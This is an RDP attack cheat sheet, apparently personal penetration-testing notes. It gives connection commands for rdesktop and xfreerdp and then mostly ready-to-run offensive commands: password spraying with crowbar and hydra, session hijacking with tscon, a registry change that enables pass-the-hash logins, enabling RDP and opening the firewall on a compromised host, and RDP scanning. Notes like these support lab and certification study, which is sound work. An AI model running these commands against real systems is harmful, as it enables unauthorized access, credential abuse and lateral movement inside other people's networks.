# RDP

## <mark style="color:yellow;">ABOUT</mark>

<mark style="color:red;">**Remote Desktop Protocol (RDP)**</mark> is a <mark style="color:purple;">**protocol**</mark> developed by **Microsoft** for remote access to a computer running the Windows OS. This protocol allows display and control commands to be transmitted via the **GUI** encrypted over **IP** networks. Works at <mark style="color:yellow;">**Application Layer**</mark> of **TCP/IP model**, typically using <mark style="color:yellow;">**TCP/3389 port.**</mark>  If **Network Address Translation (NAT)** is used on the route between client and server, as is often the case with Internet connections, the remote computer needs the public IP address to reach the server. It uses <mark style="color:yellow;">**TLS/SSL**</mark>.

## <mark style="color:yellow;">CONNECTING</mark>

### <mark style="color:blue;">Rdesktop</mark>

```bash
rdesktop -u venator17 -p 'amogus' -d domain.kek 13.13.13.13
```

### <mark style="color:blue;">Xfreerdp</mark>

#### Regular

<pre class="language-powershell"><code class="lang-powershell"><strong>xfreerdp /u:venator17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore
</strong></code></pre>

#### With Port-Forwarding

```powershell
xfreerdp /u:venator17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore
```

#### Mounting a local dir

```powershell
xfreerdp /v:13.13.13.13 /u:venator17 /p:amogus /drive:share,/home/venator17/Assessment123
```

### <mark style="color:blue;">Remmina (GUI)</mark>

```bash
reminna
```

## <mark style="color:yellow;">PASSWORD SPRAYING</mark>

### <mark style="color:blue;">Crowbar</mark>

```bash
crowbar -b rdp -s 13.13.13.13/32 -U users.txt -c 'amogus'
```

### <mark style="color:blue;">Hydra</mark>

```bash
hydra -L users.txt -p 'amogus' 13.13.13.13 rdp
```

## <mark style="color:yellow;">SESSION HIJACKING</mark>

<mark style="color:orange;">**We need SYSTEM privileges**</mark> and use <mark style="color:green;">**tscon.exe**</mark> (allows to connect to another desktop session) [**\[LINK\]**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon)

```powershell
tscon 13 /dest:V17
```

## <mark style="color:yellow;">PASS-THE-HASH</mark>

By default, Windows has disabled <mark style="color:green;">`Restricted Admin Mode`</mark>, and we need to fix that by adding new registry key to <mark style="color:green;">`DisableRestrictedAdmin`</mark>

```powershell
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```

And then to use <mark style="color:green;">**xfreerdp**</mark> for Pass The Hash

```powershell
xfreerdp /v:13.13.13.13 /u:venator17 /pth:12379NSKDFKSJDF20931C031
```

## <mark style="color:yellow;">ENABLE FROM SYSTEM</mark>

As example one time I needed to access internal host, so it would be good if I turned on rdp and made a port forwarding, So here's the steps do do it

1. Change <mark style="color:green;">`fDenyTSConnections`</mark>  Registry key which denies RDP connections

```powershell
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# OR same thing but with PowerShell, to convenience

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
```

2. Changing a Firewall to allow us to move through RDP

```powershell
netsh advfirewall firewall set rule group='remote desktop' new enable=yes
```

## <mark style="color:yellow;">Tips2Hack</mark>

1. **Nmap RDP Scan**

```bash
nmap -sV -sC 13.13.13.13 -p3389 --script rdp*
```

2. **RDP Security Check** [**\[LINK\]**](https://github.com/CiscoCXSecurity/rdp-sec-check)

```bash
./rdp-sec-check.pl 13.13.13.13
```